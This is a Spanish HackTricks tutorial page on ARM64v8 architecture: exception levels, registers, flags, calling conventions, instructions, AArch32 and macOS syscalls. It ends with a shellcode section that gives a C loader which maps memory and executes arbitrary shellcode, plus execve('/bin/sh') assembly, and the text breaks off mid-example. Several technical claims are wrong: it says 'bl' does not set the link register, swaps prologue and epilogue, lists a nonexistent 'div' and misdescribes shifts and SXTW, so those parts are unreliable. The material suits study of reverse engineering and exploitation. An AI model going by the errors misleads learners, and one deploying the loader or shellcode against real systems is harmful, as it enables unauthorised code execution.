47 KiB
Introducción a ARM64v8
Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Obtén el oficial PEASS & HackTricks swag
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de HackTricks y HackTricks Cloud.
Niveles de Excepción - EL (ARM64v8)
En la arquitectura ARMv8, los niveles de ejecución, conocidos como Niveles de Excepción (ELs), definen el nivel de privilegio y las capacidades del entorno de ejecución. Hay cuatro niveles de excepción, que van desde EL0 hasta EL3, cada uno sirviendo a un propósito diferente:
- EL0 - Modo Usuario:
- Este es el nivel de menor privilegio y se utiliza para ejecutar código de aplicación regular.
- Las aplicaciones que se ejecutan en EL0 están aisladas entre sí y del software del sistema, mejorando la seguridad y la estabilidad.
- EL1 - Modo Kernel del Sistema Operativo:
- La mayoría de los núcleos de sistemas operativos se ejecutan en este nivel.
- EL1 tiene más privilegios que EL0 y puede acceder a recursos del sistema, pero con algunas restricciones para garantizar la integridad del sistema.
- EL2 - Modo Hipervisor:
- Este nivel se utiliza para la virtualización. Un hipervisor que se ejecuta en EL2 puede gestionar múltiples sistemas operativos (cada uno en su propio EL1) que se ejecutan en el mismo hardware físico.
- EL2 proporciona características para el aislamiento y control de los entornos virtualizados.
- EL3 - Modo Monitor Seguro:
- Este es el nivel de mayor privilegio y se utiliza a menudo para el arranque seguro y entornos de ejecución confiables.
- EL3 puede gestionar y controlar los accesos entre estados seguros y no seguros (como el arranque seguro, SO confiable, etc.).
El uso de estos niveles permite gestionar de manera estructurada y segura diferentes aspectos del sistema, desde aplicaciones de usuario hasta el software del sistema más privilegiado. El enfoque de ARMv8 en los niveles de privilegio ayuda a aislar de manera efectiva diferentes componentes del sistema, mejorando así la seguridad y robustez del sistema.
Registros (ARM64v8)
ARM64 tiene 31 registros de propósito general, etiquetados como x0
a x30
. Cada uno puede almacenar un valor de 64 bits (8 bytes). Para operaciones que requieren solo valores de 32 bits, los mismos registros se pueden acceder en modo de 32 bits utilizando los nombres w0 a w30.
x0
ax7
- Estos se utilizan típicamente como registros temporales y para pasar parámetros a subrutinas.
x0
también lleva los datos de retorno de una función.
x8
- En el kernel de Linux,x8
se utiliza como el número de llamada al sistema para la instrucciónsvc
. ¡En macOS se utiliza el x16!x9
ax15
- Registros temporales adicionales, a menudo utilizados para variables locales.x16
yx17
- Registros de Llamada Intra-procedimental. Registros temporales para valores inmediatos. También se utilizan para llamadas de función indirectas y stubs de PLT (Tabla de Enlace de Procedimiento).
x16
se utiliza como el número de llamada al sistema para la instrucciónsvc
en macOS.
x18
- Registro de plataforma. Puede utilizarse como registro de propósito general, pero en algunas plataformas, este registro está reservado para usos específicos de la plataforma: Puntero al bloque de entorno de hilo actual en Windows, o para apuntar a la estructura de tarea actualmente en ejecución en el núcleo de Linux.x19
ax28
- Estos son registros preservados por el llamado. Una función debe preservar los valores de estos registros para su llamador, por lo que se almacenan en la pila y se recuperan antes de volver al llamador.x29
- Puntero de Marco para llevar un seguimiento del marco de la pila. Cuando se crea un nuevo marco de pila porque se llama a una función, el registrox29
se almacena en la pila y la dirección del nuevo puntero de marco (dirección desp
) se almacena en este registro.
- Este registro también se puede utilizar como un registro de propósito general, aunque generalmente se utiliza como referencia para variables locales.
x30
olr
- Registro de Enlace. Contiene la dirección de retorno cuando se ejecuta una instrucciónBL
(Branch with Link) oBLR
(Branch with Link to Register) almacenando el valor depc
en este registro.
- También se puede utilizar como cualquier otro registro.
- Si la función actual va a llamar a una nueva función y por lo tanto sobrescribir
lr
, se almacenará en la pila al principio, esto es el epílogo (stp x29, x30 , [sp, #-48]; mov x29, sp
-> Almacenarfp
ylr
, generar espacio y obtener nuevofp
) y se recuperará al final, esto es el prólogo (ldp x29, x30, [sp], #48; ret
-> Recuperarfp
ylr
y retornar).
sp
- Puntero de Pila, utilizado para llevar un seguimiento de la parte superior de la pila.
- el valor de
sp
siempre debe mantenerse al menos en una alineación de cuadripalabra o puede ocurrir una excepción de alineación.
pc
- Contador de Programa, que apunta a la siguiente instrucción. Este registro solo puede actualizarse a través de generaciones de excepciones, retornos de excepciones y ramas. Las únicas instrucciones ordinarias que pueden leer este registro son las instrucciones de salto con enlace (BL, BLR) para almacenar la dirección depc
enlr
(Registro de Enlace).xzr
- Registro Cero. También llamadowzr
en su forma de registro de 32 bits. Se puede utilizar para obtener fácilmente el valor cero (operación común) o para realizar comparaciones usandosubs
comosubs XZR, Xn, #10
almacenando los datos resultantes en ninguna parte (enxzr
).
Los registros Wn
son la versión de 32 bits del registro Xn
.
Registros SIMD y de Punto Flotante
Además, hay otros 32 registros de longitud de 128 bits que se pueden utilizar en operaciones optimizadas de datos múltiples de instrucción única (SIMD) y para realizar cálculos aritméticos de punto flotante. Estos se llaman registros Vn aunque también pueden operar en 64 bits, 32 bits, 16 bits y 8 bits y luego se llaman Qn
, Dn
, Sn
, Hn
y Bn
.
Registros del Sistema
Hay cientos de registros del sistema, también llamados registros de propósito especial (SPRs), que se utilizan para monitorear y controlar el comportamiento de los procesadores.
Solo se pueden leer o configurar utilizando las instrucciones especiales dedicadas mrs
y msr
.
Los registros especiales TPIDR_EL0
y TPIDDR_EL0
se encuentran comúnmente al realizar ingeniería inversa. El sufijo EL0
indica la excepción mínima desde la cual se puede acceder al registro (en este caso, EL0 es el nivel de excepción (privilegio) regular con el que se ejecutan los programas regulares).
A menudo se utilizan para almacenar la dirección base de la región de almacenamiento local de hilos en la memoria. Por lo general, el primero es legible y escribible para programas que se ejecutan en EL0, pero el segundo se puede leer desde EL0 y escribir desde EL1 (como el kernel).
mrs x0, TPIDR_EL0 ; Leer TPIDR_EL0 en x0
msr TPIDR_EL0, X0 ; Escribir x0 en TPIDR_EL0
PSTATE
PSTATE contiene varios componentes del proceso serializados en el registro especial SPSR_ELx
visible para el sistema operativo, siendo X el nivel de permiso de la excepción desencadenada (esto permite recuperar el estado del proceso cuando la excepción termina).
Estos son los campos accesibles:
- Las banderas de condición
N
,Z
,C
yV
: N
significa que la operación produjo un resultado negativoZ
significa que la operación produjo ceroC
significa que la operación se realizóV
significa que la operación produjo un desbordamiento con signo:- La suma de dos números positivos produce un resultado negativo.
- La suma de dos números negativos produce un resultado positivo.
- En la resta, cuando se resta un número negativo grande de un número positivo más pequeño (o viceversa), y el resultado no se puede representar dentro del rango del tamaño de bits dado.
- Obviamente, el procesador no sabe si la operación es con signo o no, por lo que verificará C y V en las operaciones e indicará si ocurrió un acarreo en caso de que fuera con signo o sin signo.
{% hint style="warning" %}
No todas las instrucciones actualizan estas banderas. Algunas como CMP
o TST
lo hacen, y otras que tienen un sufijo s como ADDS
también lo hacen.
{% endhint %}
- La bandera actual de ancho de registro (
nRW
): Si la bandera tiene el valor 0, el programa se ejecutará en el estado de ejecución AArch64 una vez que se reanude. - El Nivel de Excepción actual (
EL
): Un programa regular que se ejecuta en EL0 tendrá el valor 0 - La bandera de paso único (
SS
): Utilizada por los depuradores para dar un paso único configurando la bandera SS en 1 dentro deSPSR_ELx
a través de una excepción. El programa ejecutará un paso y emitirá una excepción de paso único. - La bandera de estado de excepción ilegal (
IL
): Se utiliza para marcar cuando un software privilegiado realiza una transferencia de nivel de excepción inválida, esta bandera se establece en 1 y el procesador desencadena una excepción de estado ilegal. - Las banderas
DAIF
: Estas banderas permiten a un programa privilegiado enmascarar selectivamente ciertas excepciones externas. - Si
A
es 1 significa que se activarán abortos asíncronos. ElI
se configura para responder a las Solicitudes de Interrupciones de hardware externas (IRQs). y la F está relacionada con las Solicitudes de Interrupciones Rápidas (FIRs). - Las banderas de selección de puntero de pila (
SPS
): Los programas privilegiados que se ejecutan en EL1 y superior pueden alternar entre el uso de su propio registro de puntero de pila y el del modelo de usuario (por ejemplo, entreSP_EL1
yEL0
). Este cambio se realiza escribiendo en el registro especialSPSel
. Esto no se puede hacer desde EL0.
Convención de Llamada (ARM64v8)
La convención de llamada ARM64 especifica que los primeros ocho parámetros de una función se pasan en los registros x0
a x7
. Los parámetros adicionales se pasan en la pila. El valor de retorno se pasa de vuelta en el registro x0
, o también en x1
si es de 128 bits de longitud. Los registros x19
a x30
y sp
deben ser preservados en las llamadas a funciones.
Al leer una función en ensamblador, busca el prólogo y epílogo de la función. El prólogo generalmente implica guardar el puntero de marco (x29
), configurar un nuevo puntero de marco, y asignar espacio en la pila. El epílogo generalmente implica restaurar el puntero de marco guardado y retornar de la función.
Convención de Llamada en Swift
Swift tiene su propia convención de llamada que se puede encontrar en https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64
Instrucciones Comunes (ARM64v8)
Las instrucciones ARM64 generalmente tienen el formato opcode dst, src1, src2
, donde opcode
es la operación que se va a realizar (como add
, sub
, mov
, etc.), dst
es el registro de destino donde se almacenará el resultado, y src1
y src2
son los registros de origen. También se pueden usar valores inmediatos en lugar de registros de origen.
mov
: Mover un valor de un registro a otro.- Ejemplo:
mov x0, x1
— Esto mueve el valor dex1
ax0
. ldr
: Cargar un valor de memoria en un registro.- Ejemplo:
ldr x0, [x1]
— Esto carga un valor desde la ubicación de memoria apuntada porx1
enx0
. - Modo de desplazamiento: Se indica un desplazamiento que afecta al puntero de origen, por ejemplo:
ldr x2, [x1, #8]
, esto cargará en x2 el valor de x1 + 8-
ldr x2, [x0, x1, lsl #2]
, esto cargará en x2 un objeto del array x0, desde la posición x1 (índice) * 4 - Modo pre-indexado: Esto aplicará cálculos al origen, obtendrá el resultado y también almacenará el nuevo origen en el origen.
ldr x2, [x1, #8]!
, esto cargaráx1 + 8
enx2
y almacenará en x1 el resultado dex1 + 8
str lr, [sp, #-4]!
, Almacena el registro de enlace en sp y actualiza el registro sp- Modo post-indexado: Es similar al anterior pero se accede a la dirección de memoria y luego se calcula y almacena el desplazamiento.
ldr x0, [x1], #8
, cargax1
enx0
y actualiza x1 conx1 + 8
- Dirección relativa al PC: En este caso, la dirección a cargar se calcula en relación con el registro PC
ldr x1, =_start
, Esto cargará la dirección donde comienza el símbolo_start
en x1 en relación con el PC actual.str
: Almacenar un valor de un registro en memoria.- Ejemplo:
str x0, [x1]
— Esto almacena el valor enx0
en la ubicación de memoria apuntada porx1
. ldp
: Cargar Par de Registros. Esta instrucción carga dos registros de ubicaciones de memoria consecutivas. La dirección de memoria generalmente se forma sumando un desplazamiento al valor en otro registro.- Ejemplo:
ldp x0, x1, [x2]
— Esto cargax0
yx1
desde las ubicaciones de memoria enx2
yx2 + 8
, respectivamente. stp
: Almacenar Par de Registros. Esta instrucción almacena dos registros en ubicaciones de memoria consecutivas. La dirección de memoria generalmente se forma sumando un desplazamiento al valor en otro registro.- Ejemplo:
stp x0, x1, [sp]
— Esto almacenax0
yx1
en las ubicaciones de memoria ensp
ysp + 8
, respectivamente. stp x0, x1, [sp, #16]!
— Esto almacenax0
yx1
en las ubicaciones de memoria ensp+16
ysp + 24
, respectivamente, y actualizasp
consp+16
.add
: Sumar los valores de dos registros y almacenar el resultado en un registro.- Sintaxis: add(s) Xn1, Xn2, Xn3 | #imm, [desplazamiento #N | RRX]
- Xn1 -> Destino
- Xn2 -> Operando 1
- Xn3 | #imm -> Operando 2 (registro o inmediato)
- [desplazamiento #N | RRX] -> Realiza un desplazamiento o llama a RRX
- Ejemplo:
add x0, x1, x2
— Esto suma los valores enx1
yx2
y almacena el resultado enx0
. add x5, x5, #1, lsl #12
— Esto es igual a 4096 (un 1 desplazado 12 veces) -> 1 0000 0000 0000 0000adds
Esto realiza unaadd
y actualiza las banderassub
: Resta los valores de dos registros y almacena el resultado en un registro.- Verificar la sintaxis de
add
. - Ejemplo:
sub x0, x1, x2
— Esto resta el valor enx2
dex1
y almacena el resultado enx0
. subs
Esto es como sub pero actualizando la banderamul
: Multiplica los valores de dos registros y almacena el resultado en un registro.- Ejemplo:
mul x0, x1, x2
— Esto multiplica los valores enx1
yx2
y almacena el resultado enx0
. div
: Divide el valor de un registro por otro y almacena el resultado en un registro.- Ejemplo:
div x0, x1, x2
— Esto divide el valor enx1
porx2
y almacena el resultado enx0
. lsl
,lsr
,asr
,ror
,rrx
:- Desplazamiento lógico a la izquierda: Agrega 0 desde el final moviendo los otros bits hacia adelante (multiplicar por n-veces 2)
- Desplazamiento lógico a la derecha: Agrega 1 al principio moviendo los otros bits hacia atrás (dividir por n-veces 2 en no firmado)
- Desplazamiento aritmético a la derecha: Como
lsr
, pero en lugar de agregar 0 si el bit más significativo es 1, se agregan 1s (dividir por n-veces 2 en firmado) - Rotación a la derecha: Como
lsr
pero lo que se elimina de la derecha se agrega a la izquierda - Rotación a la derecha con extensión: Como
ror
, pero con la bandera de acarreo como el "bit más significativo". Entonces la bandera de acarreo se mueve al bit 31 y el bit eliminado a la bandera de acarreo. bfm
: Movimiento de campo de bits, estas operaciones copian bits0...n
de un valor y los colocan en las posicionesm..m+n
. El#s
especifica la posición del bit más a la izquierda y#r
la cantidad de rotación a la derecha.- Movimiento de campo de bits:
BFM Xd, Xn, #r
- Movimiento de campo de bits firmado:
SBFM Xd, Xn, #r, #s
- Movimiento de campo de bits no firmado:
UBFM Xd, Xn, #r, #s
- Extracción e inserción de campo de bits: Copia un campo de bits de un registro y lo copia en otro registro.
BFI X1, X2, #3, #4
Inserta 4 bits de X2 desde el 3er bit de X1BFXIL X1, X2, #3, #4
Extrae desde el 3er bit de X2 cuatro bits y los copia en X1SBFIZ X1, X2, #3, #4
Extiende con signo 4 bits de X2 e inserta en X1 comenzando en la posición del bit 3, anulando los bits derechosSBFX X1, X2, #3, #4
Extrae 4 bits comenzando en el bit 3 de X2, extiende con signo y coloca el resultado en X1UBFIZ X1, X2, #3, #4
Extiende con ceros 4 bits de X2 e inserta en X1 comenzando en la posición del bit 3, anulando los bits derechosUBFX X1, X2, #3, #4
Extrae 4 bits comenzando en el bit 3 de X2 y coloca el resultado extendido con ceros en X1.- Extensión de signo a X: Extiende el signo (o agrega solo 0s en la versión no firmada) de un valor para poder realizar operaciones con él:
SXTB X1, W2
Extiende el signo de un byte de W2 a X1 (W2
es la mitad deX2
) para llenar los 64 bitsSXTH X1, W2
Extiende el signo de un número de 16 bits de W2 a X1 para llenar los 64 bitsSXTW X1, W2
Extiende el signo de un byte de W2 a X1 para llenar los 64 bitsUXTB X1, W2
Agrega 0s (no firmado) a un byte de W2 a X1 para llenar los 64 bitsextr
: Extrae bits de un par de registros concatenados especificados.- Ejemplo:
EXTR W3, W2, W1, #3
Esto concatenará W1+W2 y obtendrá desde el bit 3 de W2 hasta el bit 3 de W1 y lo almacenará en W3. cmp
: Compara dos registros y establece las banderas de condición. Es un alias desubs
estableciendo el registro de destino en el registro cero. Útil para saber sim == n
.- Admite la misma sintaxis que
subs
- Ejemplo:
cmp x0, x1
— Esto compara los valores enx0
yx1
y establece las banderas de condición en consecuencia. cmn
: Compara negativo el operando. En este caso es un alias deadds
y admite la misma sintaxis. Útil para saber sim == -n
.ccmp
: Comparación condicional, es una comparación que se realizará solo si una comparación anterior fue verdadera y establecerá específicamente los bits nzcv.cmp x1, x2; ccmp x3, x4, 0, NE; blt _func
-> si x1 != x2 y x3 < x4, saltar a func- Esto se debe a que
ccmp
solo se ejecutará si el anteriorcmp
fue unNE
, si no, los bitsnzcv
se establecerán en 0 (lo que no satisfará la comparaciónblt
). - Esto también se puede usar como
ccmn
(igual pero negativo, comocmp
vscmn
). tst
: Comprueba si alguno de los valores de la comparación son ambos 1 (funciona como un ANDS sin almacenar el resultado en ningún lugar). Es útil para verificar un registro con un valor y verificar si alguno de los bits del registro indicado en el valor es 1.- Ejemplo:
tst X1, #7
Verifica si alguno de los últimos 3 bits de X1 es 1 teq
: Operación XOR descartando el resultadob
: Salto incondicional- Ejemplo:
b myFunction
- Tenga en cuenta que esto no llenará el registro de enlace con la dirección de retorno (no es adecuado para llamadas de subrutina que necesitan regresar)
bl
: Salto con enlace, utilizado para llamar a una subrutina. Almacena la dirección de retorno enx30
.- Ejemplo:
bl myFunction
— Esto llama a la funciónmyFunction
y almacena la dirección de retorno enx30
. - Tenga en cuenta que esto no llenará el registro de enlace con la dirección de retorno (no es adecuado para llamadas de subrutina que necesitan regresar)
blr
: Salto con enlace al registro, utilizado para llamar a una subrutina donde el destino está especificado en un registro. Almacena la dirección de retorno enx30
. (Esto es- Ejemplo:
blr x1
— Esto llama a la función cuya dirección está contenida enx1
y almacena la dirección de retorno enx30
. ret
: Retorno de subrutina, típicamente utilizando la dirección enx30
.- Ejemplo:
ret
— Esto retorna de la subrutina actual utilizando la dirección de retorno enx30
. b.<cond>
: Saltos condicionalesb.eq
: Salto si igual, basado en la instruccióncmp
anterior.- Ejemplo:
b.eq label
— Si la instruccióncmp
anterior encontró dos valores iguales, esto salta alabel
. b.ne
: Branch if Not Equal. Esta instrucción verifica las banderas de condición (que fueron establecidas por una instrucción de comparación previa), y si los valores comparados no son iguales, se desplaza a una etiqueta o dirección.- Ejemplo: Después de una instrucción
cmp x0, x1
,b.ne label
— Si los valores enx0
yx1
no son iguales, esto salta alabel
. cbz
: Comparar y Desplazarse en Caso de Cero. Esta instrucción compara un registro con cero, y si son iguales, se desplaza a una etiqueta o dirección.- Ejemplo:
cbz x0, label
— Si el valor enx0
es cero, esto salta alabel
. cbnz
: Comparar y Desplazarse en Caso de No Cero. Esta instrucción compara un registro con cero, y si no son iguales, se desplaza a una etiqueta o dirección.- Ejemplo:
cbnz x0, label
— Si el valor enx0
no es cero, esto salta alabel
. tbnz
: Probar bit y desplazarse en caso de no cero- Ejemplo:
tbnz x0, #8, label
tbz
: Probar bit y desplazarse en caso de cero- Ejemplo:
tbz x0, #8, label
- Operaciones de selección condicional: Estas son operaciones cuyo comportamiento varía dependiendo de los bits condicionales.
csel Xd, Xn, Xm, cond
->csel X0, X1, X2, EQ
-> Si es verdadero, X0 = X1, si es falso, X0 = X2csinc Xd, Xn, Xm, cond
-> Si es verdadero, Xd = Xn, si es falso, Xd = Xm + 1cinc Xd, Xn, cond
-> Si es verdadero, Xd = Xn + 1, si es falso, Xd = Xncsinv Xd, Xn, Xm, cond
-> Si es verdadero, Xd = Xn, si es falso, Xd = NO(Xm)cinv Xd, Xn, cond
-> Si es verdadero, Xd = NO(Xn), si es falso, Xd = Xncsneg Xd, Xn, Xm, cond
-> Si es verdadero, Xd = Xn, si es falso, Xd = - Xmcneg Xd, Xn, cond
-> Si es verdadero, Xd = - Xn, si es falso, Xd = Xncset Xd, Xn, Xm, cond
-> Si es verdadero, Xd = 1, si es falso, Xd = 0csetm Xd, Xn, Xm, cond
-> Si es verdadero, Xd = <todos 1>, si es falso, Xd = 0adrp
: Calcular la dirección de página de un símbolo y almacenarla en un registro.- Ejemplo:
adrp x0, symbol
— Esto calcula la dirección de página desymbol
y la almacena enx0
. ldrsw
: Cargar un valor firmado de 32 bits desde la memoria y extenderlo a 64 bits.- Ejemplo:
ldrsw x0, [x1]
— Esto carga un valor firmado de 32 bits desde la ubicación de memoria apuntada porx1
, lo extiende a 64 bits, y lo almacena enx0
. stur
: Almacenar un valor de registro en una ubicación de memoria, usando un desplazamiento desde otro registro.- Ejemplo:
stur x0, [x1, #4]
— Esto almacena el valor enx0
en la dirección de memoria que es 4 bytes mayor que la dirección actual enx1
. svc
: Realizar una llamada al sistema. Significa "Supervisor Call". Cuando el procesador ejecuta esta instrucción, cambia de modo de usuario a modo kernel y salta a una ubicación específica en memoria donde se encuentra el código de manejo de llamadas al sistema del kernel.- Ejemplo:
mov x8, 93 ; Cargar el número de llamada al sistema para salir (93) en el registro x8.
mov x0, 0 ; Cargar el código de estado de salida (0) en el registro x0.
svc 0 ; Realizar la llamada al sistema.
Prólogo de Función
- Guardar el registro de enlace y el puntero de marco en la pila:
{% code overflow="wrap" %}
stp x29, x30, [sp, #-16]! ; store pair x29 and x30 to the stack and decrement the stack pointer
{% endcode %}
- Establecer el nuevo puntero de marco:
mov x29, sp
(establece el nuevo puntero de marco para la función actual) - Asignar espacio en la pila para variables locales (si es necesario):
sub sp, sp, <size>
(donde<size>
es el número de bytes necesario)
Epílogo de la Función
- Desasignar variables locales (si se asignaron):
add sp, sp, <size>
- Restaurar el registro de enlace y el puntero de marco:
{% code overflow="wrap" %}
ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment the stack pointer
{% endcode %}
- Retorno:
ret
(devuelve el control al llamante usando la dirección en el registro de enlace)
Estado de Ejecución AARCH32
Armv8-A soporta la ejecución de programas de 32 bits. AArch32 puede ejecutarse en uno de dos conjuntos de instrucciones: A32
y T32
y puede alternar entre ellos a través de interworking
.
Los programas privilegiados de 64 bits pueden programar la ejecución de programas de 32 bits ejecutando una transferencia de nivel de excepción al nivel de excepción de menor privilegio de 32 bits.
Cabe destacar que la transición de 64 bits a 32 bits ocurre con una disminución del nivel de excepción (por ejemplo, un programa de 64 bits en EL1 desencadenando un programa en EL0). Esto se hace configurando el bit 4 de SPSR_ELx
registro especial en 1 cuando el hilo de proceso AArch32
está listo para ser ejecutado y el resto de SPSR_ELx
almacena los CPSR de los programas AArch32
. Luego, el proceso privilegiado llama a la instrucción ERET
para que el procesador haga la transición a AArch32
entrando en A32 o T32 dependiendo de CPSR**.**
El interworking
ocurre utilizando los bits J y T de CPSR. J=0
y T=0
significa A32
y J=0
y T=1
significa T32. Básicamente, esto se traduce en establecer el bit más bajo en 1 para indicar que el conjunto de instrucciones es T32.
Esto se establece durante las instrucciones de rama de interworking, pero también se puede establecer directamente con otras instrucciones cuando el PC se establece como el registro de destino. Ejemplo:
Otro ejemplo:
_start:
.code 32 ; Begin using A32
add r4, pc, #1 ; Here PC is already pointing to "mov r0, #0"
bx r4 ; Swap to T32 mode: Jump to "mov r0, #0" + 1 (so T32)
.code 16:
mov r0, #0
mov r0, #8
Registros
Hay 16 registros de 32 bits (r0-r15). Desde r0 hasta r14 se pueden utilizar para cualquier operación, sin embargo, algunos de ellos suelen estar reservados:
r15
: Contador de programa (siempre). Contiene la dirección de la siguiente instrucción. En A32 actual + 8, en T32, actual + 4.r11
: Puntero de marcor12
: Registro de llamada intra-procedimentalr13
: Puntero de pilar14
: Registro de enlace
Además, los registros se respaldan en registros bancarios
. Estos son lugares que almacenan los valores de los registros permitiendo realizar un cambio de contexto rápido en el manejo de excepciones y operaciones privilegiadas para evitar la necesidad de guardar y restaurar manualmente los registros cada vez.
Esto se hace guardando el estado del procesador desde el CPSR
al SPSR
del modo de procesador al que se lleva la excepción. En los retornos de excepción, el CPSR
se restaura desde el SPSR
.
CPSR - Registro de Estado del Programa Actual
En AArch32, el CPSR funciona de manera similar a PSTATE
en AArch64 y también se almacena en SPSR_ELx
cuando se toma una excepción para restaurar más tarde la ejecución:
Los campos se dividen en algunos grupos:
- Registro de Estado del Programa de Aplicación (APSR): Banderas aritméticas y accesibles desde EL0
- Registros de Estado de Ejecución: Comportamiento del proceso (gestionado por el sistema operativo).
Registro de Estado del Programa de Aplicación (APSR)
- Las banderas
N
,Z
,C
,V
(como en AArch64) - La bandera
Q
: Se establece en 1 cuando ocurre saturación entera durante la ejecución de una instrucción aritmética de saturación especializada. Una vez que se establece en1
, mantendrá el valor hasta que se establezca manualmente en 0. Además, no hay ninguna instrucción que verifique su valor implícitamente, debe hacerse leyéndolo manualmente. - Banderas
GE
(Mayor o igual): Se utiliza en operaciones SIMD (Instrucción Única, Múltiples Datos), como "suma paralela" y "resta paralela". Estas operaciones permiten procesar varios puntos de datos en una sola instrucción.
Por ejemplo, la instrucción UADD8
suma cuatro pares de bytes (de dos operandos de 32 bits) en paralelo y almacena los resultados en un registro de 32 bits. Luego establece las banderas GE
en el APSR
basándose en estos resultados. Cada bandera GE corresponde a una de las adiciones de bytes, indicando si la adición para ese par de bytes se desbordó.
La instrucción SEL
utiliza estas banderas GE para realizar acciones condicionales.
Registros de Estado de Ejecución
- Los bits
J
yT
:J
debe ser 0 y siT
es 0 se utiliza el conjunto de instrucciones A32, y si es 1, se utiliza el T32. - Registro de Estado de Bloque IT (
ITSTATE
): Estos son los bits del 10 al 15 y del 25 al 26. Almacenan condiciones para instrucciones dentro de un grupo con prefijoIT
. - Bit
E
: Indica la extremidad. - Bits de Modo y Máscara de Excepción (0-4): Determinan el estado de ejecución actual. El quinto indica si el programa se ejecuta como 32 bits (un 1) o 64 bits (un 0). Los otros 4 representan el modo de excepción actualmente en uso (cuando ocurre una excepción y se está manejando). El conjunto de números indica la prioridad actual en caso de que se desencadene otra excepción mientras se está manejando esta.
AIF
: Ciertas excepciones pueden deshabilitarse utilizando los bitsA
,I
,F
. SiA
es 1 significa que se desencadenarán abortos asíncronos. ElI
se configura para responder a las Solicitudes de Interrupciones de Hardware externas (IRQs). y la F está relacionada con las Solicitudes de Interrupciones Rápidas (FIRs).
macOS
Llamadas al sistema BSD
Consulta syscalls.master. Las llamadas al sistema BSD tendrán x16 > 0.
Trampas de Mach
Consulta en syscall_sw.c la mach_trap_table
y en mach_traps.h los prototipos. El número máximo de trampas de Mach es MACH_TRAP_TABLE_COUNT
= 128. Las trampas de Mach tendrán x16 < 0, por lo que debes llamar a los números de la lista anterior con un menos: _kernelrpc_mach_vm_allocate_trap
es -10
.
También puedes consultar libsystem_kernel.dylib
en un desensamblador para encontrar cómo llamar a estas llamadas al sistema (y BSD):
{% code overflow="wrap" %}
# macOS
dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e
# iOS
dyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64
{% endcode %}
{% hint style="success" %}
A veces es más fácil revisar el código descompilado de libsystem_kernel.dylib
que revisar el código fuente porque el código de varias llamadas al sistema (BSD y Mach) se genera a través de scripts (ver comentarios en el código fuente) mientras que en el dylib puedes encontrar qué se está llamando.
{% endhint %}
Llamadas machdep
XNU admite otro tipo de llamadas llamadas dependientes de la máquina. El número de estas llamadas depende de la arquitectura y ni las llamadas ni los números están garantizados a permanecer constantes.
Página de comunicación
Esta es una página de memoria del propietario del kernel que se mapea en el espacio de direcciones de cada proceso de usuario. Está destinada a hacer que la transición de modo usuario a espacio de kernel sea más rápida que usar llamadas al sistema para servicios del kernel que se utilizan tanto que esta transición sería muy ineficiente.
Por ejemplo, la llamada gettimeofdate
lee el valor de timeval
directamente desde la página de comunicación.
objc_msgSend
Es muy común encontrar esta función utilizada en programas Objective-C o Swift. Esta función permite llamar a un método de un objeto Objective-C.
Parámetros (más información en la documentación):
- x0: self -> Puntero a la instancia
- x1: op -> Selector del método
- x2... -> Resto de los argumentos del método invocado
Por lo tanto, si colocas un punto de interrupción antes del salto a esta función, puedes encontrar fácilmente qué se invoca en lldb con (en este ejemplo, el objeto llama a un objeto de NSConcreteTask
que ejecutará un comando):
(lldb) po $x0
<NSConcreteTask: 0x1052308e0>
(lldb) x/s $x1
0x1736d3a6e: "launch"
(lldb) po [$x0 launchPath]
/bin/sh
(lldb) po [$x0 arguments]
<__NSArrayI 0x1736801e0>(
-c,
whoami
)
Códigos Shell
Para compilar:
as -o shell.o shell.s
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib
# You could also use this
ld -o shell shell.o -syslibroot $(xcrun -sdk macosx --show-sdk-path) -lSystem
Para extraer los bytes:
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh
for c in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n '\\x'$c
done
Código C para probar el shellcode
// code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c
// gcc loader.c -o loader
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] = "<INSERT SHELLCODE HERE>";
int main(int argc, char **argv) {
printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));
void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
printf("[+] SUCCESS: mmap\n");
printf(" |-> Return = %p\n", ptr);
void *dst = memcpy(ptr, shellcode, sizeof(shellcode));
printf("[+] SUCCESS: memcpy\n");
printf(" |-> Return = %p\n", dst);
int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ);
if (status == -1) {
perror("mprotect");
exit(-1);
}
printf("[+] SUCCESS: mprotect\n");
printf(" |-> Return = %d\n", status);
printf("[>] Trying to execute shellcode...\n");
sc = ptr;
sc();
return 0;
}
Shell
Tomado de aquí y explicado.
{% tabs %} {% tab title="con adr" %}
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).
_main:
adr x0, sh_path ; This is the address of "/bin/sh".
mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.
mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.
mov x16, #59 ; Move the execve syscall number (59) into x16.
svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.
sh_path: .asciz "/bin/sh"
{% endtab %}
{% tab title="con pila" %}
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
